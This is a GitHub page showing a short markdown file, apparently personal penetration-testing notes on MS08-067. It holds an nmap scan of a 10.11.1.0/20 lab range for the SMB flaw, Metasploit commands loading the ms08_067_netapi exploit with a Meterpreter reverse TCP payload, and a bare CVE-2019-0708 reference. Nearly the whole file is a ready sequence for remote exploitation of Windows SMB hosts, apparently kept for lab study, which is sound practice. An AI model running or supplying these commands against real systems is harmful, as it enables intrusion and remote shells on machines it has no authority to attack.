Skip to content

Latest commit

 

History

History
4 lines (4 loc) · 182 Bytes

MS08_067.md

File metadata and controls

4 lines (4 loc) · 182 Bytes
>nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20
>use exploit/windows/smb/ms08_067_netapi
>set payload windows/meterpreter/reverse_tcp
CVE-2019-0708